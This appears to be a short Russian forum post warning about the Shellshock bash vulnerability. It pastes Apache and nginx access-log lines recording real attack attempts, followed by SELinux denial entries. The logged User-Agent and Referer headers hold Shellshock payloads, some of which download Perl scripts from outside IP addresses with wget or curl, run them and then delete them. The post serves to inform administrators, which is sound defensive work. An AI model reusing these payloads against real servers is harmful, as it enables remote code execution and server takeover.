Всем привет. Для тех, кто не в курсе — опасная удалённая уязвимость в bash, эксплуатируется через всё на свете.

/var/log/httpd/access_log:146.71.113.194 - - [29/Sep/2014:05:45:42 +0600] "GET /cgi-bin/helpme HTTP/1.0" 404 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
/var/log/httpd/access_log-20140928:209.126.230.72 - - [25/Sep/2014:08:23:10 +0600] "GET / HTTP/1.0" 200 775 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
/var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET / HTTP/1.0" 200 775 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
/var/log/httpd/access_log-20140928:70.42.149.68 - - [27/Sep/2014:03:42:09 +0600] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
/var/log/httpd/access_log-20140928:54.251.83.67 - - [27/Sep/2014:19:43:52 +0600] "GET / HTTP/1.1" 200 775 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
/var/log/httpd/access_log-20140928:173.45.100.18 - - [28/Sep/2014:01:31:23 +0600] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
/var/log/nginx/access.log:146.71.113.194 - - [29/Sep/2014:05:45:43 +0600] "GET /cgi-bin/helpme HTTP/1.0" 404 5506 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22" "-"

type=AVC msg=audit(1412010002.438:57): avc: denied { search } for pid=1599 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir
type=AVC msg=audit(1412010002.439:58): avc: denied { search } for pid=1599 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir
type=AVC msg=audit(1412010301.563:82): avc: denied { search } for pid=1693 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir
type=AVC msg=audit(1412010301.563:83): avc: denied { search } for pid=1693 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir
type=AVC msg=audit(1412010601.978:96): avc: denied { search } for pid=1768 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir
type=AVC msg=audit(1412010601.978:97): avc: denied { search } for pid=1768 comm="PassengerHelper" name="tmp" dev=dm-0 ino=3215 scontext=system_u:system_r:httpd_passenger_helper_t:s0 tcontext=system_u:object_r:httpd_tmpfs_t:s0 tclass=dir